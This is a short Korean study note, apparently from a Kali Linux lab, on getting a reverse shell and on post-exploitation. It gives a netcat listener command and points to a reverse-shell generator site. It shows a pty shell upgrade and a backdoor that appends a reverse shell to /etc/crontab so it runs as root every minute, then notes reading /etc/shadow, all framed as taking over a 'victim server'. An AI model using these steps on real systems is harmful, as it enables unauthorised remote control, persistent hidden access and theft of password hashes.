리버스쉘, POST - Exploit

1. 작업 환경 

    - VirtualBox

    - kali_linux

 

2. 리버스 쉘 획득 

    - 통상 서버는 방화벽에서 인바운드 규칙은 잘 설정하지만, 아웃바운드 규칙은 변수가 많이 때문에 잘 설정하지 않는다. 

      그래서 해커들을 보통 리버스 쉘을 사용함

    - 공격자 컴퓨터 포트 여는 명령 : nc -nlvp [열고자 하는 포드 번호]

    - 리버스 쉘 실행을 위한 명령어 작성해주는 곳에서 명령어를 획득하여 피해자 서버의 cmd창에서 실행 

       * 피해자 서버의 원격 코드 실행이 가능하다는 전제임

       * 리버스 쉘 관련 홈페이지 : 구글링 또는 www.revshells.com (예: 리눅스, nc mkfifo)

Online - Reverse Shell Generator

 

3. POST - Exploit

    □ 권한 상승

       - 운영체제 마다 다르지만 특정 운영체제에 대한 권한 상승 (privilege escalation) 구글링으로 권한 상승 정보 얻기

       - 예를 들어 리눅스의 경우 DB 관련 자료 찾기, 관련 자료에서 아이디 및 비밀번호 힌트 얻기, su root 명령어 사용시

         터미널에서 실행하라는 말이 나오면  [python -c "import pty;pty.spawn('/bin/bash')"] 명령어 사용 

    □ Back Door 설치 : 나중에 다시 피해 서버에 원할때 바로 들어갈 수 있도록 하는 방법

       - 리버스쉘 실행 명령어를 cron에 설정 

          * 1분마다 루트 권한으로 리버스쉘 실행 :  echo "* * * * * root [리버스쉘 명령어]" >> /etc/crontab

       - 피해자 서버에 들어가고 싶을때 설정되어 있는 공격자 컴퓨터 포트를 열면 1분 뒤에 루트 권한으로 피해자 컴퓨터

         원격 제어 가능    * 예 : nc -nlvp 9999 

    □ 무적 상태가 됨, 루트 권한만 볼 수 있는 /etc/shadow 파일도 볼 수 있고 모든 행위가 가능해짐